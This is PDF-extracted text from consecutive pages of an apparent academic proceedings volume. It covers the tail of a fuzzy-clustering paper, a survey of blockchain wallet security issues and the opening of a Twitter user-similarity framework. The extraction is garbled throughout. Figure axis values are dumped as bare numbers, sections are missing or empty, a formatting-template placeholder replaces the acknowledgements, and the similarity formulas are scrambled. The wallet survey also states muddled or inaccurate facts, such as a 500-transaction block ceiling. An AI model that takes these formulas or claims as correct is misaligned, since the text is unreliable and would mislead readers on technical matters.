Fig. 4 DO on D115 on various threshold values a 0.05, b 0.10, c 0.15, d 0.20, e 0.25, f 0.30
20 20
0 0
-20 -20
-40 -40
-40 -20 0 20 40 60 -50 0 50 100
(a) (b)
40 40
20 20
0 0
-20 -20
-40 -40
-50 0 50 100 -50 0 50 100
(c) (d)
40 40
20
20
0
0
-20
-20
-40
-40 -60
-50 0 50 100 -50 0 50 100
(e) (f)
Fig. 5 DB on D115 on various threshold values a 0.05, b 0.10, c 0.15, d 0.20, e 0.25
D15
Series1 Series2
20
15
10
0
0.00
0.05
0.10
0.15
0.20
0.25
0.30
0.35
0.40
0.45
0.50
0.55
0.60
0.65
0.70
0.75
0.80
0.85
0.90
0.95
1.00
Bensaid Dataset
Series1 Series2
350
300
250
200
150
100
50
0
0
0.04
0.08
0.12
0.16
0.2
0.24
0.28
0.32
0.36
0.4
0.44
0.48
0.52
0.56
0.6
0.64
0.68
0.72
0.76
0.8
0.84
0.88
0.92
0.96
1
Fig. 8 DO versus DB on Bensaid dataset
References
1. Hawkins, D. M. (1980). Identification of outliers (Vol. 11). London: Chapman and Hall.
2. Wu, X., Kumar, V., Ross Quinlan, J., Ghosh, J., Yang, Q., Motoda, H., McLachlan, G.J., et al.
(2008). Top 10 algorithms in data mining. Knowledge and Information Systems 14(1).
3. Ye, Xi., Zongxiang, Lu., Qiao, Y., Min, Y., & O’Malley, M. (2016). Identification and correction
of outliers in wind farm time series power data. IEEE Transactions on Power Systems, 31(6),
4197–4205.
4. Forero, P. A., Shafer, S., & Harguess, J. D. (2017). Sparsity-Driven Laplacian-regularized
outlier identification for dictionary learning. IEEE Transactions on Signal Processing, 65(14),
3803–3817.
5. Bezdek, J. C., Ehrlich, R., & Full, W. (1984). FCM: The fuzzy c-means clustering algorithm.
Computers & Geosciences, 10(2–3), 191–203.
6. Gosain, A., & Dahiya, S. (2016). Performance analysis of various fuzzy clustering algorithms:
A review. Procedia Computer Science, 79, 100–111.
7. Dahiya, S., Gosain, A., & Mann, S. (2020). Experimental analysis of fuzzy clustering
algorithms. InIntelligent data engineering and analytics (pp. 311–320). Singapore: Springer.
8. Dahiya, S., Gosain, A., & Gupta, S. (2020). RKT2FCM: RBF Kernel-Based Type-2 Fuzzy
Clustering. Available at SSRN 3577549.
9. Dahiya, S., Nanda, H., Artwani, J., & Varshney, J. (2020). Using clustering techniques and
classification mechanisms for fault diagnosis. International Journal, 9(2).
10. Han, J., Kamber, M., & Pei, J. (2006). Data mining, southeast asia edition: Concepts and
techniques. Morgan Kaufmann
11. Kaur, P., & Gosain, A. (2010). Density-oriented approach to identify outliers and get noiseless
clusters in Fuzzy C—Means. In 2010 IEEE International Conference on Fuzzy Systems (FUZZ)
(pp. 1–8). IEEE.
12. Kaur, P., & Gosain, A. (2011). A density oriented fuzzy C-means clustering algorithm for recog-
nising original cluster shapes from noisy data. International Journal of Innovative Computing
and Applications, 3(2), 77–87.
778 A. Gosain and S. Dahiya
13. Gosain, A., & Dahiya, S. (2020). A new robust fuzzy clustering approach: DBKIFCM. Neural
Processing Letters, 52(3), 2189–2210.
14. Ester, M., Kriegel, H.-P., Sander, J., & Xiaowei, Xu. (1996). A density-based algorithm for
discovering clusters in large spatial databases with noise. Kdd, 96(34), 226–231.
Analysis of Security Issues in Blockchain
Wallet
1 Introduction
Blockchain is getting traction every day since it was introduced by Satoshi Nakamoto
in 2008 as technology to support cryptocurrency [1]. It was initially invented for the
Taruna
DPG Degree College, Gurugram, Haryana 122001, India
Rishabh (B)
ABES Engineering College, Ghaziabad, Uttar Pradesh 201009, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 779
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_63
780 Taruna and Rishabh
Bitcoin, but in later years, it has implications and applications in the areas of finance,
governance, energy grids, Internet of Things (IoT), healthcare, businesses and indus-
tries, supply chain management, education to security and privacy, and many more [2–
5]. Although various blockchain-based cryptocurrencies such as ethereum, cardano,
nano, vertcon, etc. have been issued by digital financing companies in recent past,
Bitcoin is still having the largest market capital [6]. This immutable technology is
considered immune to third party interfere, but owing to its wide spread popularity,
it is a hot target for cyber hackers [7]. These cyber risks are considered as a prime
concern in financial transactions involving critical information. With the evolution
of internet, security becomes more solicitude. Satoshi instigate blockchain which
is considered, by far, the most secure technology for exchange of information and
funds on online platform [8].
Blockchain technology gets its popularity because of its decentralized and peer-to-
peer transaction capability [9]. Although trust is the major issue with any centralized
system, which involve any third party for communication, but blockchain has the
capability of peer-to-peer transaction, so it removes the need of presence of any
third party for transaction [10]. In other words, sender and receiver, the two peers
in any transaction, can communicate directly. Decentralization of blocks builds a
trustworthy system because everyone can use it anywhere, anytime, with an internet
connection.
Blockchain is a list of records called blocks. Number of blocks created from
multiple series of transactions, are connected to form a chain called ledger. This
ledger is distributed across all nodes in the network, and all the nodes in the
network will be given a copy of ledger to save, making it a Public Distributed
Ledger as shown in Fig. 1. Due to this decentralization, the risk of data tampering
reduces and data get more cryptographically secure than any centralized system [11].
Blockchain is of three types basically: public, private and hybrid. But [12] categorize
blockchain in a novel way as Cryptocurrency blockchain C2C, Business to Cryp-
tocurrency blockchain B2C and business to business blockchain B2B, depending on
its applications.
A blockchain structure has majorly two components: one is its header and other
component has transaction details. Block header contain all the details required to
carry out a transaction in blockchain [13]. It has a wallet which is basically address
of a node in the form of numbers and letters, which is public. In any transaction
Fig. 2 Attributes of a
blockchain block
detail, only the numbers of a wallet will be visible; no record of the person(s) can be
found. On the contrary, a private key is string of random numbers which is known
only to the person to which it belongs. When a transaction is performed by a node
in network, it will sign the transaction using its private key [14, 15] (Fig. 2).
Each block along with wallet has hash value of its own block and previous block.
The hash value of a block is a unique identifier, which is generated by using hash
function. To impart more security to block, trusted hash function can be generated
using transaction record and previous block hash value as shown in Fig. 3. Such hash
function is more secure because if someone tries to change hash of a block, it needs
to change the hash of all previous blocks which is almost impossible to achieve.
To further enhance the security, make the blocks more secure and reliable, nounce
is added after each block. Each transaction basically has the details of transaction
along with wallet address of both sender and receiver and digital signature of the
sender. These details are encrypted using different encryption methods depending
on the implementation.
A block can store multiple details of transaction but not more than a ceiling of
500 transactions per block that it can store. Once a block reaches that limit, then a
new block will be created. Satoshi proposed an upper limit of 1 Mega Byte (MB) to
the size of a block [1]. It can grow up to 8 MB and sometimes more [4]. The size of
a block limits the number of transactions verified with each block by a miner. The
bigger the block size more the transactions verified.
A blockchain wallet is a digital locker which is basically a program that permits the
users to manage their cryptocurrency. It holds public and private keys of a user to
encrypt transaction details. A transaction is successful only if there is a match of
public and private keys of a blockchain.
Wallets can be categorized in to multiple varieties but majorly used wallets
category include the following three types depending on where a wallet is stored
[16].
Software Wallet: As the name implies, these wallets are stored in the system either
computer device or mobile device or online using Web browser. It comes with the
advantage of easy use, but security, hacking and regular back up are some pit holes
of these wallets.
Hardware Wallet: These wallets are popular due to high security and safety
compared to software wallets. Hardware wallets can store private keys of blockchain
system for users on a hardware device called Universal Serial Bus (USB) device but
they are costly to buy and use.
Paper Wallet: These are cold storage wallets where blockchain public and private
keys are generated through an application which are then printed as Quick Response
(QR) code to process a transaction. They are the safest as the beholder has to be
concerned for keeping the paper safe. But the time taken by such wallets is high
because QR code scanning is involved in every transaction.
All the cryptocurrencies used so far are based on cryptographic public–private key
system. Public keys are known to everyone and are included in every transaction detail
to show the target of funds transferred. On the other hand, private key is used for
authentication and signing a transaction, and it is known only to a person it belongs
to. Any transaction associated with an address and the generation of this address
needs private key of the sender. The blockchain wallet emerges in such scenario,
which automatically generates and stores private key for each transaction without
disclosing it to anyone [17].
The main issue with blockchain private keys is that it is a random alphanumeric
which is very hard to remembered by human being. Traditionally, the storage mech-
anism for private keys is memorization of key, cold wallets, keeping key structure
simple which can be memorized, use of wallet provider for keeping key and storing
keys in encrypted wallets [18]. All these methods have one or more problems like
complexity of private key, cold wallets insecurity, inefficiency of encrypted digital
keys, etc.
Analysis of Security Issues in Blockchain Wallet 783
2 Literature Review
Almost all available wallets backup private keys as mnemonics which are hard for
user to remember. To remember them, a person has to write his private key mnemonic
on a paper which is inconvenient and insecure way. Rezaeighaleh and Zouhave
presented a backup scheme for hardware wallet using which one can transfer private
key from one wallet to other using an entrusted terminal [21]. This strategy creates
two wallets with same keys and provides opportunity for user to use one as main
wallet and other as backup wallet.
Blockchain itself is facing a lot of security issues [22]. But blockchain wallets are
the easiest and main pray for attackers. People always rely and trust on blockchain
security, overseeing its benefits and overlooking its weaknesses. Cybercriminals can
use traditional hacking methods for attacking wallets, or they can go ahead to find
and explore new ways to get access for private key [23]. This section mainly focuses
on such users’ vulnerabilities for wallets in blockchain, as enunciated below:
Analysis of Security Issues in Blockchain Wallet 785
During the consensus phase, it is very important to check the integrity and authen-
ticity of data as well as restricting false stations to enter to secure wallet. There are
many chances of attacks like phishing, hot wallet attacks, etc. in consensus phase.
Researchers have proposed various algorithms where they suggest layering system
implemented differently to protect wallet. Om Pal et al. have analysed the existing
PKI and the necessity of key management for wallet of blockchain [11]. For secure
group communication during consensus phase, a group key management (GKM)
scheme was proposed by them. Multi-layer system architecture was proposed and
786 Taruna and Rishabh
tested. It is assumed that upper layer nodes have been given more rights and privileges
while nodes at same level have same privileges.
Ganet al. have also presented double layered structure for blockchain with Central-
ized Certificate Authorities (CCA) has the power to store public keys and add IoT
node for inner layer, and inner nodes in turn can store public keys and add nodes for
outer layer [11, 29, 30]. Matsumoto and Reischuk have shown that any misconduct
in Certificate Authorities (CA) can be regulated by consensus of the nodes known as
Instant Karma PKI [31]. Guardtime approach suggested the use of Physical Unclon-
able Function (PUF) for identification of IoT devices by using physical properties of
the device for required output [32]. A distinctive public–private key pair is generated
using the output and these keys are then used in blockchain transactions. Although
there are too many layers suggested, attacker can still invade through them. Also,
these models require a lot of computation and hard to implement.
He et al. have presented a more secure, semi-trusted, portable social-network-
based wallet-management technique with advanced features of security, portability,
authentication and recovery [33]. They review related wallet management tools
presented in [34–37] to come up with a system design having more secure storage,
portable remote login on multiple devices, authentication without password, blind
wallet recovery, etc. The system model has four entities—User (U), Management
device (M), Proxy (P) and Central Server (C). M acts as representative of U and
memorize its sensitive data. P can be on any smart device using which user can
remotely login and perform a transaction. Performance analysis of the purposed
system proves enhanced security and fully functional wallet with little overhead and
time delay (in millisecond).
Ning Wang and others have proposed an algorithm to improve security [38]. The
method used by them secure the private key of blockchain by storing it using image
steganography technique. In their scheme, firstly private key is padded with some
random number then converted to binary matrix and later to minimize error during
transmission an error correction code is included. The system is proved to have high
robustness, transparency and hence high security. Various other researchers have
proposed techniques to combine steganography with cryptography to implement
key management in blockchain wallet [39–42].
Hosam presented fractal stenographic technique to secure blockchain wallet as
this hold keys which are used for purchasing and selling of coins, most importantly
user’s private key [43]. Boiangiu et al. have used fractal trees to hide private key.
A fractal is a complex image generated using iterations of a single formula using
different values in each iteration and the result of previous iteration [44].
Researches by Ma and Sun have taken the advantages of blockchain for decen-
tralization and stronger security in IOT where the problem in existing schemes of
key management depends upon centralized authentication [45]. On the other hand,
Tin et al. used these features of blockchain in dynamic wireless sensor networks
(WSNs) used in industrial IOT [46]. Comparison of various research work done by
researchers is mentioned in Table 1.
Zhu et al. introduced an architectural framework of high availability (HA)-eWallet
which is an online wallet [47]. They have adopted an active architectural scheme.
Analysis of Security Issues in Blockchain Wallet 787
The work of Engelmann et al. have two service units viz. a transaction gateway and
two storage units [48]. Fangdong Zhu propose three models viz. normal dual-master
model based on multi-signature technology as put forward by [49], where Fangdong
use 3 of 5 schemes i.e. generate 5 keys randomly and sign the transaction using
3 of them. The other 2 keys have been chosen and encrypted randomly and then
sent to transaction gateway separately. These keys are stored in storage units and all
the data should be backed periodically to ‘disaster recovery center’. The other two
models Simplex and Recovery model are used in case of one or both storage units’
failure, respectively. Authors guaranteed the smooth and secure functioning of the
architecture till loss of 50% of user’s private keys in total [50].
3 Comparative Analysis
The above literature study reveals that making private key more secure is the most
effective way to protect the wallet from hackers and attackers. In this section, we will
analyses benefits and shortcomings of some of them to find a best solution ahead.
Comparison of related research work done by researchers is mentioned in Table 1.
Various new items and research reports reflect that the loss due to breach of crypto-
systems is enormous [51–53, 54]. As per these reports, the cryptocurrency crimes
have surpassed a figure of US$ 1.36 billion in five months till May 2020 alone. It
is predicted to be the second highest crime year in terms of cryptocurrencies. Last
788 Taruna and Rishabh
year in 2019, the total crypto losses due to hacks and frauds were recorded to be $4.5
billion as enunciated in Table 2.
Apart from it, there were two major losses in first three months of the year 2019
which result in just massive crypto loss [54]. As a specific event, one major loss is
in 2019 was noted when founder and CEO of a Canadian Cryptocurrency exchange
platform Mr Gerry Cotton’s sudden demise. As per the reports, it is speculated that
Cotton had printed client’s private keys and he used cold wallets to store them. This
incident puts a question on the security levels of cold wallets.
The Web-based study from Reuters states that in 2018, out of $1.7 billion digital
currency loses $950 million is just because of crypto exchanges and infrastructure
services like wallets [52]. Analysing the records of past five years from 2016 to May
2020 reveals that crypto crime losses move almost linearly during 2016 to 2017.
There is not much increase in crypto crimes, but from 2018 onwards, it seems to
increase exponentially. The Fig. 4 envisages the spike in number of crypto crimes
during past five years. Solid lines in the chart show complete year data and dotted
lines shows the data of current year till May 2020.
4 Conclusion
Acknowledgements Acknowledgements and Reference heading should be left justified, bold, with
the first letter capitalized but have no numbers. Text below continues as normal.
References
10. Rajput, S., Singh, A., Khurana, S., Bansal, T., & Shreshtha, S. (2019). Blockchain tech-
nology and cryptocurrenices. In 2019 Amity International Conference on Artificial Intelli-
gence (AICAI), Dubai, United Arab Emirates (pp. 909–912). https://doi.org/10.1109/AICAI.
2019.8701371
11. Pal, O., Alam, B., Thakur, V., & Singh, S. (2019). Key management for blockchain technology.
In ICT Express, ISSN 2405-9595. https://doi.org/10.1016/j.icte.2019.08.002
12. Sabah, S., Mahdi, N., & Majeed, I. (2019). The road to the blockchain technology: Concept
and types. Periodicals of Engineering and Natural Sciences (PEN) (Vol. 7, pp. 1821–1832),
Dec 2019. https://doi.org/10.21533/pen.v7i4.935
13. Conti, M., Sandeep Kumar, E., Lal, C., & Ruj, S. (2018). A survey on security and privacy
issues of bitcoin. In IEEE Communications Surveys & Tutorials (Vol. 20, No. 4, pp. 3416–3452),
Fourthquarter 2018. https://doi.org/10.1109/COMST.2018.2842460
14. Li, X., Jiang, P., Chen, T., Luo, X., & Wen, Q. A survey on the security of blockchain systems.
Future Generation Computer Systems, 107, 841–853. ISSN 0167-739X
15. Dasgupta, D., Shrein, J. M., & Gupta, K. D. (2019). A survey of blockchain from security
perspective. Journal of Banking and Financial Technology, 3, 1–17. https://doi.org/10.1007/
s42786-018-00002-6
16. Jokić, S., Cvetković, A. S., Adamović, S., Ristić, N., & Spalević, P. (2019). Comparative
analysis of cryptocurrency wallets vs traditional wallets. Proceedings of International Journal
for Economic Theory and Practice and Social Issues, Oct 2019, https://scindeks-clanci.ceon.
rs/data/pdf/0350-137X/2019/0350-137X1903065J.pdf
17. Latifa, E.-R., Ahemed, E. K. M., Mohamed, E. G., & Omar, A. Blockchain: bitcoin
wallet cryptography security, challenges and countermeasures. Journal of Internet Banking
and Commerce. https://www.icommercecentral.com/open-access/blockchain-bitcoin-wallet-
cryptography-security-challenges-and-countermeasures.php?aid=86561
18. Aydar, M., Cetin, S., Ayvaz, S., & Aygun, B. (2020). Private key encryption and recovery in
blockchain. Submitted on 9 Jul 2019 (v1), last revised 25 Jun 2020 (this version, v2).
19. Sun, S.-F., Au, M. H., Liu, J. K., & Yuen, T. H., (2017). RingCT 2.0: A compact accumulator-
based (linkable ring signature) protocol for blockchain cryptocurrency monero. In Proc. Eur.
Symp. Res. Comput. Secur. (pp. 456–474).
20. https://cointelegraph.com/news/14b-in-crypto-stolen-in-first-five-months-of-2020-says-cip
hertrace. Accessed on Oct. 21, 2020.
21. Rezaeighaleh, H., & Zou, C. C. (2019). New secure approach to backup cryptocurrency wallets.
In 2019 IEEE Global Communications Conference (GLOBECOM), Waikoloa, HI, USA (pp. 1–
6). https://doi.org/10.1109/GLOBECOM38437.2019.9014007
22. https://ledgerops.com/blog/2019-03-28-top-five-blockchain-security-issues-in-2019.
Accessed on Oct. 16, 2020.
23. Kaushal, P. K., Bagga, A., & Sobti, R. (2017). Evolution of bitcoin and security risk in bitcoin
wallets. In 2017 International Conference on Computer, Communications and Electronics
(Comptelix), Jaipur (pp. 172–177). https://doi.org/10.1109/COMPTELIX.2017.8003959
24. Wang, H., Wang, Y., Cao, Z., Li, Z., Xiong, G. (2019). An overview of blockchain security
analysis. In: X. Yun, et al. (eds.). Cyber Security. CNCERT 2018, Communications in Computer
and Information Science (Vol. 970). Springer. https://doi.org/10.1007/978-981-13-6621-5_5
25. https://www.bleepingcomputer.com/news/security/iota-cryptocurrency-users-lose-4-million-
in-clever-phishing-attack/#:~:text=A%20clever%20hacker%20made%20off,steal%20m
oney%20from%20users’%20accounts.Accessed on Oct. 23, 2020.
26. Breitner, J., Heninger, N. (2019). Biased Nonce sense: Lattice attacks against weak ECDSA
signatures in cryptocurrencies. In: I. Goldberg, T. Moore (eds.). Financial cryptography and
data security. FC 2019. Lecture Notes in Computer Science (Vol. 11598). Cham: Springer.
https://doi.org/10.1007/978-3-030-32101-7_1
27. https://www.internetsociety.org/blog/2017/11/roca-encryption-vulnerability. Accessed on Oct.
21, 2020.
28. https://www.zdnet.com/article/upbit-cryptocurrency-exchange-loses-48-5-million-to-hackers.
Accessed on Oct. 21, 2020.
Analysis of Security Issues in Blockchain Wallet 791
29. Gan, S. (2017). An IoT simulator in NS3 and a key based authentication architecture for IoT
devices using blockchain. Indian Institute of Technology, Kanpur (online). https://security.cse.
iitk.ac.in/node/240. Accessed on Oct. 21, 2020.
30. Salman, T., Zolanvari, M., Erbad, A., Jain, R., & Samaka, M. (2019). Security services using
blockchains: A state-of-the-art survey. In IEEE Communications Surveys & Tutorials (Vol. 21,
No. 1, pp. 858–880), Firstquarter. https://doi.org/10.1109/COMST.2018.2863956
31. Matsumoto, S., Reischuk, R. M. (2017). IKP: turning a PKI around with decentralized auto-
mated incentives. In 2017 IEEE Symposium on Security and Privacy, SP, San Jose, CA
(pp. 410–426).
32. Guardtime. (2017). Internet of Things authentication: A blockchain solution using SRAM phys-
ical unclonable functions (online). https://www.intrinsic-id.com/wpcontent/uploads/2017/05/
gt_KSIPUF-web-1611pdf. Accessed on Oct. 21, 2020.
33. He, S., et al. (2018). A social-network-based cryptocurrency wallet-management scheme. IEEE
Access, 6, 7654–7663. https://doi.org/10.1109/ACCESS.2018.2799385
34. Litke, P., & Stewart, J. (2014). Cryptocurrency-stealing malware landscape (Online). Available
https://www.secureworks.com/research/cryptocurrency-stealing-malware-landscape
35. M. Team. Multibit. Available: https://multibit.org. Accessed on Oct. 21, 2020.
36. Wuille. P. (2020).Bip32: Hierarchical deterministic wallets. Available: https://github.com/gen
jix/bips/blob/master/bip0032.md. Accessed on Oct. 2, 2020.
37. Vasek, M., Bonneau, J., Ryan Castellucci, C. K., & Moore, T. (2016). The Bitcoin brain drain:
A short paper on the use and abuse of Bitcoin brain wallets. In Financial Cryptography and
Data Security (Lecture Notes in Computer Science). New York, NY, USA: Springer.
38. Wang, N., Chen, Y., Yang, Y., Fang, Z. & Sun, Y. (2019). Blockchain private key storage
algorithm based on image information hiding. https://doi.org/10.1007/978-3-030-24268-8_50
39. Biswas, C., Gupta, U. D., & Haque, M. M. (2019). An efficient algorithm for confiden-
tiality, integrity and authentication using hybrid cryptography and steganography. In 2019
International Conference on Electrical, Computer and Communication Engineering (ECCE),
Cox’sBazar, Bangladesh (pp. 1–5). https://doi.org/10.1109/ECACE.2019.8679136
40. Rashmi, N., & Jyothi, K. (2018). An improved method for reversible data hiding steganography
combined with cryptography (pp. 81–84). https://doi.org/10.1109/ICISC.2018.8398946
41. Kumar, R., & Singh, N. (2020). A survey based on enhanced the security of image using the
combined techniques of steganography and cryptography (March 29, 2020). In Proceedings of
the International Conference on Innovative Computing & Communications (ICICC), Available
at SSRN: https://ssrn.com/abstract=3563571
42. Chauhan, S., Jyotsna, Kumar, J., & Doegar, A. (2017). Multiple layer text security using vari-
able block size cryptography and image steganography. In 2017 3rd International Conference
on Computational Intelligence & Communication Technology (CICT), Ghaziabad (pp. 1–7).
https://doi.org/10.1109/CIACT.2017.7977303
43. Hosam, O. (2018). Hiding bitcoins in steganographic fractals (pp. 512–519). https://doi.org/
10.1109/ISSPIT.2018.8642736
44. Boiangiu, C.-A., & Morosan, A., & Stan, M. (2015). Fractal objects in computer graphics.
45. Ma, H., & Sun, G. (2020). Blockchain-based group key management scheme in IoT. In D.
S. Huang, V. Bevilacqua, A. Hussain (eds.). Intelligent Computing Theories and Application.
ICIC 2020. Lecture Notes in Computer Science (Vol. 12463). Cham: Springer. https://doi.org/
10.1007/978-3-030-60799-9_39
46. Tian, Y., Wang, Z., Xiong, J., & Ma, J. (2020). A blockchain-based secure key management
scheme with trustworthiness in DWSNs. IEEE Transactions on Industrial Informatics, 16(9),
6193–6202. https://doi.org/10.1109/TII.2020.2965975
47. Zhu, F., et al. (2017). Trust your wallet: A new online wallet architecture for Bitcoin. In
2017 International Conference on Progress in Informatics and Computing (PIC), Nanjing
(pp. 307–311). https://doi.org/10.1109/PIC.2017.8359562
48. Engelmann, C., Scott, S. L., Leangsuksun, C., & He, X. (2008). Symmetric active/active high
availability for high-performance computing system services: Accomplishments and limita-
tions. In 2008 Eighth IEEE International Symposium on Cluster Computing and the Grid
(CCGRID) (pp. 813–818).
792 Taruna and Rishabh
49. Tschorsch, F., & Scheuermann, B. (2016). Bitcoin and beyond: A technical survey on decen-
tralized digital currencies. IEEE Communications Surveys & Tutorials, 18(3), 2084–2123.
50. Alqahtani, H., Kavakli-Thorne, M., & Kumar, G. (2019). Applications of Generative Adver-
sarial Networks (GANs): An updated Review. Arch Computat Methods Eng. https://doi.org/
10.1007/s11831-019-09388-y
51. https://ciphertrace.com/spring-2020-cryptocurrency-anti-money-laundering-report. Accessed
on Oct. 21, 2020.
52. https://in.reuters.com/article/us-crypto-currency-crime/cryptocurrency-thefts-scams-hit-1-7-
billion-in-2018-report-idINKCN1PN1SQ. Accessed on Oct. 17, 2020.
53. https://www.cnbc.com/2019/01/29/crime-still-plague-cryptocurrencies-as-1point7-billion-
was-stolen-last-year-.html. Accessed on Oct. 19.
A Contextual Framework to Find
Similarity Between Users on Twitter
Abstract Twitter is one of the most used social networking sites, and people usually
prefer to share about themselves, their views, and other things that they have an
interest on Twitter. The method proposed can be used by the average Twitter user
to find out their degree of similar they are to any other user on the platform. The
presented Framework finds similarity between any two users on Twitter dependent on
the eight parameters which are Mention Similarity, Common Interest, Topic and List
similarity, followers and following relationship similarity, retweets, likes, common
hashtags, and profile Similarity. Every parameter generates some score, and the score
of each parameter is not dependent on any other parameter score. Weightage has been
assigned to each parameter according to the score they are getting individually, and
the value of each weight lies between 0 and 1. Each parameter requires user data
that has been extracted using Twitter’s own API such as follower, retweet, like,
hashtag, etc. For each Twitter user, data of eight parameters are collected for 2019
October to 2020 October. The framework can be used for suggesting how similar two
users on Twitter are. The framework has been verified using datasets of five users,
and from these datasets, percentage similarity is being calculated. For finding the
effectiveness of the framework, the result of our case study was compared against a
survey of human judges consisting of 524 people and was found to be moderately
effective.
S. Dahiya
CSE Department, Delhi Technological University, Delhi 110042, India
G. Kumar (B) · A. Yadav
SE Department, Delhi Technological University, Delhi 110042, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 793
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_64
794 S. Dahiya et al.
1 Introduction
2 Related Work
The active research pertaining to Twitter revolves around clustering users with similar
interests. This can be utilized in various fields such as finding online communities,
finding people with similar interests, and personalizing and curating advertisements
for users. In the following section, major related work of last decade is discussed:
Goal et al. [1] formed a method of finding similar Twitter users using various
parameters such as social graph structure, the popularity of user, user interaction data,
and content analysis. The created framework is scalable to users with large active
followings and users with a small number of followers alike. Due to this scalability of
the framework, it can find similar users for a very large amount of users. A machine
learning-based framework was proposed, which was built on Hadoop. A dataset of
candidates was constructed using a cosine similarity algorithm based on a graph,
and then the candidates were ranked based on parameters using a logistic regression
model trained on Twitter data from previous years. In this paper, the methodology
only works between two users and is not yet scalable to large datasets.
Razis et al. [2] formed a method for finding similarity between users on the basis
of their content. The metrics used were based on the combination of the four param-
eters, which are: URLs, mentions, hashtags, and the URL domains mentioned in the
user’s tweets. For calculating their final metric, they used scores that they got from
the similarity metric. The two important factors used were “followers to follower”
and “tweet creation rate.” The major areas this paper deals with are rating how much
influence a particular user account has, introducing an ontology for sanctifying Twit-
ter entities and describing a framework that finds similar accounts and their relation
with other such accounts on Twitter. Some related parameter in addition to a few
new ones was used in this paper to compute similarity.
Vathi et al. [3] described that the methodology to find similar communities works
on a few similarity metrics based on the interactions users have on Twitter, such as:
the following relationship and shared content computed. For all the hashtags, vector
space model of TF-IDF weights is used. After combining all these similarity linearly,
they generate the total similarity score. Along with similarity scores, each parameter
is assigned a weight. The weights are multiplied to the score, and the summation of
these scores gives the total similarity score.
Kamath et al. [4] propose a method of computing account similarity on RealGraph
using cosine similarity. Diverse interaction data are taken in by RealGraph, and it
then tries to predict possible user interaction in the time to come. The prediction
scores calculated by RealGraph are interpreted as the strength of the connection,
which allows a wide range of applications to use RealGraph. Who To Follow (WTF)
is an application of RealGraph, which is used by Twitter to suggest similar users
based on common interests and connections among users.
Ghenawat et al. [5] are using a variety of signals to compute a similarity score and
then use MapReduce to process these signals. The MapReduce takes a group of input
key/value pairs and uses that to build a group of output key/value pairs. The library
of MapReduce conveys the computation as two separate functions: Map and Reduce.
796 S. Dahiya et al.
The user writes Map, which takes an input pair and produces a group of intermediate
key/value pairs. This gives their formula high scalability. They let the users decide
the weight assigned to each signal as they believe similarity is subjective. In this
paper, weights assigned to the parameters are not decided by the user; instead, they
are based on the score value for each parameter.
3 Proposed Framework
After seeing the users following, followers, tweets, retweets, users’ interest, and some
other parameters, a framework has been devised to quantify the similarity between the
users. This section will describe all the parameter formulas for computing similarity
between two users: the first being the input user and the other known as the test user.
Every parameter has its respective formula to calculate the parameter score.
For every parameter score, weightage has been assigned between 0 and 1, accord-
ing to the scores that the input user and test user are getting using the formula. The
weights are then multiplied with their respective scores, and the summation gives us
the total similarity score. Using this score, we then find the percentage similarity of
the input user to the test user. Table 1 shows all the parameters that are being used
to find similarity and their definition. The following section describes the proposed
framework in further detail.
For every parameter, weight is assigned as each parameter does not have equal
importance in calculating the similarity score; for example, as likes are the most
common activity, its weight is comparatively low as it is not a very good indicator of
similarity. The weight is assigned to the parameter based on the parameter similarity
scores they get, respectively. The weights are not dependent on any other thing; they
depend only on the score that the parameter gets.
The value of the weight lies between zero and one, and the reason for taking a
weight value between zero and one is so the weight does not affect the final score
very much. If the weight is one, this means this weight has more weightage compared
to all the parameters, and if the weight is zero, it means it has very little weightage.
Weights will change according to the scores as they will get updated as the data get
updated.
Table 1 Formula used for each parameter similarity computation
Name Formula Explanation
Following and follower Sim r elationshi p (Ai , A j ) =
⎧ p is the number of the Ai ’s followers, and q is the number of
relationship similarity ⎪
⎨1 if test user appears in one list Ai ’s following
2 if test user appears in one lists (2)
⎪
⎩p+q if test user appears in all lists
Mention similarity Simmention (Ai , A j ) = TwtsThrd: function that returns the total count of tweets in a
w TwtsThrd(A , A )
i j 1 thread of tweets where Ai has mentioned A j . ThrdTot: count
× (3)
l=1 Thrdtot(Ai , A j ) accntsTot(l, Ai ) of total tweets in given thread. accntsTot: gives the total count
of users in the selected thread. w is the total number of threads
taken into consideration.
Retweets similarity SimRetwt (Ai , A j ) = NoTwtsInRetwtList(Ai , A j ) (4) Is the number of tweet that Ai retweeted of A j
A Contextual Framework to Find Similarity …
Like similarity SimLike (Ai , A j ) = NoTwtsInLikeList(Ai , A j ) (5) Is the number of tweet that Ai liked of A j
w 1
SimHashtag (Ai , A j ) =
l=1 1 + Hashset(Ai , A j , Hl )
Common hashtag used (6) P gives the count of positive tweet that user has on hashtag. N
Hashset(Ai , A j , H ) = |N U T (Ai , H )NUT(A j , H )|+
gives the count of negative tweet that user has on hashtag.
|N (Ai , H )N (A j , H )| + |P(Ai , H )P(A j , H )| NUT gives the count of neutral tweet on the common hashtags.
w gives the count of total hashtags that Ai and A j have both
used in their tweets.
Common interest SimInterest (Ai , A j ) = count(ints(Ai ) ∩ (ints(A j )) (7) Ints does an analysis and gives the top five interests of the users
⎧
⎪Gender(Ai )is equal to gender(A j )+
⎨
Profile similarity SimProfile = language(Ai )is equal to language(A j )+ (8) Gender gives the gender of the user. Language gives the
⎪
i
⎩location(A )is equal to location(A )
j
language of the user and Location—where the user is located
Topic and list similarity SimTopic (Ai , A j ) = numOfTopicandList(Ai , A j ) (9) numofSimTopic(Ai ,A j ) is the number of common topics
followed by both Ai and A j
797
798 S. Dahiya et al.
As all parameter similarity scores vary in different ranges, they have been rescaled
to make all the elements lie between 0 and 1, thus bringing all the values of numeric
columns in the dataset to a common scale. This made the scores more consistent so
that the effect of each score would be about the same and would depend majorly on
the weights of each parameter. This is a technique used to reduce data redundancy
and eliminate undesirable characteristics. The formula being used for normalization
is as follows:
(x − min(k)) × (max( j) − min( j))
y= + min( j) (1)
max(k) − min(k)
where
X is the value that is to be normalized.
min(k) is smallest value in the dataset.
max(k) is the maximum value in the dataset.
min( j) is the normalization range’s minimum value.
max( j) is the normalization range’s maximum value.
1. In this framework, the value of x is the score that came after applying parameter
formula individually, min(k) is smallest value for individual parameter data, max(k)
is largest value for each parameter, max(j) is 10, and min(j) is 0.
8
